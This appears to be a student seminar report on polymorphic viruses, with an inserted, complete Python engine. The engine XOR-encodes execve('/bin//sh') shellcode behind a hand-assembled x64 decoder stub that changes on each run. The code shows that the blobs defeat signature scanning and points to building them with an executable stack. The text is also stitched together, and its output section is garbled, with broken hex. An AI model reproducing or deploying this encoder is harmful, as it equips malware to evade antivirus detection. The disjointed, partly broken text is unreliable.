“Polymorphic virus”
A Technical Seminar Report Submitted in partial fulfillment of
BACHELOR OF TECHNOLOGY
in
(16MH1A0587)
Under the esteemed guidance of
Dr. B. ANNAPURNA
2016-2020
ABSTRACT
Index
Security: viruses & prevention
->How does anti-virus detect viruses?
->detection methods
->Heuristic analysis
->working of heuristic analysis
Types of virus:
->Polymorphic Virus
- about polymorphic virus
- implementation
- examples
- metamorphic virus
- difference between polymorphic and metamorphic virus
SECURITY
Computer security, cyber security or information technology
security is the protection of computer systems from the theft of or
damage to their hardware, software, or electronic data, as well as
from the disruption or misdirection of the services they provide.
Prevent:
To prevent infection, use antivirus (anti-malware) software, keep
it up to date, and run regularly scheduled scans with it. Secure
your network as well: around the year 2000 most viruses spread by
email, and before that most computers were infected by macro
viruses.
Virus signature
A virus signature is the fingerprint of a virus: a set of unique
data, or bits of code, that allows it to be identified. Antivirus
software uses the signature to find the virus in a computer's file
system, allowing it to detect, quarantine, and remove the virus.
Detection methods:
Decoder structure
An encoded payload has two parts. The first is called the stub,
and it is the code responsible for decoding the second part, the
payload. An example is a XOR encoder: you XOR the payload byte by
byte with the value 0xAA, and then write a stub that runs through
the payload byte by byte, XORs each byte with 0xAA again (XOR with
the same key is its own inverse), and finally jumps to the decoded
payload. Only the stub keeps a fixed form; the payload bytes change
whenever the key changes, which is what defeats a signature taken
from the plain payload.
For the sake of simplicity, the encoding of the payload is
usually done in a high-level programming language such as
Python, while the decoder is written in x64 assembly, because
the decoder is part of the shellcode that actually runs.
Note:-
“\x90\x6a\x3b\x58\x48\x2f\x73\x68\x6a\x6e\x53\x54\x5f
\x52\x54\x5e” are shellcode bytes written as hexadecimal \x
escapes, the form in which they are placed in a C string.
The core of the code generation in encoder.py is the poly(..)
function, which emits a fresh stub and encoded payload on each run.
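The following is an added example, not the report's own encoder.py or decoder.nasm. It implements the two-part structure described above (decoder stub plus XOR-encoded payload) and goes one step further than the fixed 0xAA key: each generation picks a fresh single-byte key that leaves no NUL in the encoded bytes, and picks among equivalent x64 instruction forms so that the stub itself also varies. The stub is a JMP-CALL-POP decoder assembled by hand from fixed x86-64 opcodes, the payload is a constructed sample (the common execve("/bin//sh") sequence), and the "signature" is simply the "/bin//sh" string inside it, to show why the virus-signature approach from the earlier section stops matching once the payload is encoded. The function names (poly, build_stub, recover_payload, signature_hit) are this example's own.

```python
"""Polymorphic XOR encoder with a hand-assembled x64 JMP-CALL-POP decoder stub.

Added example, not the report's encoder.py / decoder.nasm. Every opcode
below is a fixed x86-64 encoding; the payload is a constructed sample.
"""
import random

# Constructed sample payload: Linux x86-64 execve("/bin//sh", NULL, NULL).
PAYLOAD = bytes.fromhex(
    "4831f656"                # xor rsi,rsi ; push rsi
    "48bf2f62696e2f2f7368"    # movabs rdi, "/bin//sh"
    "57545f"                  # push rdi ; push rsp ; pop rdi
    "6a3b5899"                # push 0x3b ; pop rax ; cdq
    "0f05"                    # syscall
)
SIGNATURE = bytes.fromhex("2f62696e2f2f7368")   # "/bin//sh": a typical signature

# Interchangeable instruction forms; the engine picks one of each per
# generation so the stub changes as well as the encoded payload.
ZERO_RCX = [bytes.fromhex("4831c9"),     # xor rcx,rcx
            bytes.fromhex("31c9"),       # xor ecx,ecx (zero-extends into rcx)
            bytes.fromhex("4829c9")]     # sub rcx,rcx
NEXT_BYTE = [bytes.fromhex("48ffc6"),    # inc rsi
             bytes.fromhex("4883c601"),  # add rsi,1
             bytes.fromhex("488d7601")]  # lea rsi,[rsi+1]


def xor_bytes(data, key):
    """XOR every byte with the key; XOR is its own inverse, so this encodes and decodes."""
    return bytes(b ^ key for b in data)


def choose_key(payload, rng):
    """Single-byte key that never equals a payload byte, so the encoded
    payload contains no NUL (a NUL would end the C string carrying it)."""
    usable = [k for k in range(1, 256) if k not in payload]
    if not usable:
        raise ValueError("no single-byte XOR key avoids a NUL for this payload")
    return rng.choice(usable)


def build_stub(key, length, zero_rcx, next_byte):
    """Assemble the decoder for a payload of `length` bytes (1..255).

    Layout:  jmp short CALL ; DEC: pop rsi ; rcx=0 ; mov cl,len ;
             LOOP: xor byte [rsi],key ; advance rsi ; loop LOOP ; jmp rsi ;
             CALL: call DEC            <- pushes the payload address
    """
    if not 1 <= length <= 255:
        raise ValueError("mov cl / loop handles at most 255 bytes")
    body = bytes([0x80, 0x36, key]) + next_byte            # xor byte [rsi],key ; rsi++
    body += bytes([0xE2, (-len(body) - 2) & 0xFF])         # loop LOOP (rel8, backwards)
    decoder = (b"\x5e" + zero_rcx + bytes([0xB1, length])  # pop rsi ; rcx=0 ; mov cl,len
               + body + b"\xff\xe6")                       # ... ; jmp rsi
    jmp_over = bytes([0xEB, len(decoder)])                 # jmp short CALL
    call_back = -(len(decoder) + 5)                        # rel32 from after the call to DEC
    call = b"\xe8" + (call_back & 0xFFFFFFFF).to_bytes(4, "little")
    return jmp_over + decoder + call


def poly(payload, rng=None):
    """One polymorphic generation: fresh key, fresh stub variant, same behaviour."""
    rng = rng or random.Random()
    key = choose_key(payload, rng)
    stub = build_stub(key, len(payload), rng.choice(ZERO_RCX), rng.choice(NEXT_BYTE))
    return stub + xor_bytes(payload, key)


def recover_payload(blob):
    """Walk the stub the way the CPU would and return the payload it decodes.

    Structural check only (no execution): follow the jmp to the call, the
    call back to `pop rsi`, then read length and key out of the decoder.
    """
    if blob[0] != 0xEB:
        raise ValueError("stub must start with jmp short")
    call_at = 2 + blob[1]
    rel = int.from_bytes(blob[call_at + 1:call_at + 5], "little", signed=True)
    if blob[call_at] != 0xE8 or call_at + 5 + rel != 2 or blob[2] != 0x5E:
        raise ValueError("call does not land on pop rsi")
    payload_at = call_at + 5                               # the pushed return address
    dec = blob[3:call_at]
    i = dec.index(0xB1)                                    # mov cl, len
    length, key = dec[i + 1], dec[i + 4]
    if dec[i + 2:i + 4] != b"\x80\x36" or dec[-2:] != b"\xff\xe6":
        raise ValueError("unexpected decoder body")
    return xor_bytes(blob[payload_at:payload_at + length], key)


def signature_hit(sample, signature=SIGNATURE):
    """The whole of signature scanning: does the fixed byte string occur?"""
    return signature in sample


if __name__ == "__main__":
    for seed in range(3):
        blob = poly(PAYLOAD, random.Random(seed))
        assert recover_payload(blob) == PAYLOAD
        print(f"seed {seed}: {len(blob)} bytes, signature hit: {signature_hit(blob)}, "
              f"stub starts {blob[:8].hex()}")
    print("plain payload, signature hit:", signature_hit(PAYLOAD))
```

Every run produces a different byte string that decodes to the same payload, and the plain "/bin//sh" signature matches the raw payload but not any generated blob. recover_payload only checks the structure statically; to execute a generated blob, write its bytes as \x escapes into shellcode.c and build it with the gcc line shown in the output below, as the report does.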
Output:
./encoder.py
# nasm -felf64 decoder.nasm -o decoder.o && ld decoder.o -o decoder
Not detected
# ./encoder.py
# nasm -felf64 decoder.nasm -o decoder.o && ld decoder.o -o decoder
# for i in `objdump -d decoder | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$'` ;
\xeb\x47\x48\x8b\x3c\x24\x48\x83\xc4\x08\x48\x89\xfb\x8x11\x1b
# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
VIRLOCK:-
First Self-Reproducing Ransomware is also a Shape Shifter.
Win32/VirLock is ransomware that locks victims' screens
but also acts as a parasitic virus, infecting existing files on
their computers. The virus is also polymorphic, which
makes it an interesting piece of malware to analyze. This was
the first time such a combination of malware features had
been observed.
URSNIF:-
BAGLE:
Bagle (also known as Beagle) was a mass-mailing
computer worm affecting Microsoft Windows. The first
strain, Bagle.A, did not propagate widely. A second
variant, Bagle.B, was considerably more virulent.
Metamorphic virus:
A metamorphic virus is a type of malware that is capable of
changing its code and signature patterns with each
iteration. Metamorphic viruses are considered more
advanced threats than typical malware or even polymorphic
viruses: a polymorphic virus only re-encodes a fixed body
behind a changing decoder stub, so the body is identical once
decoded, whereas a metamorphic virus rewrites the body
itself, leaving no constant decoded form to scan for.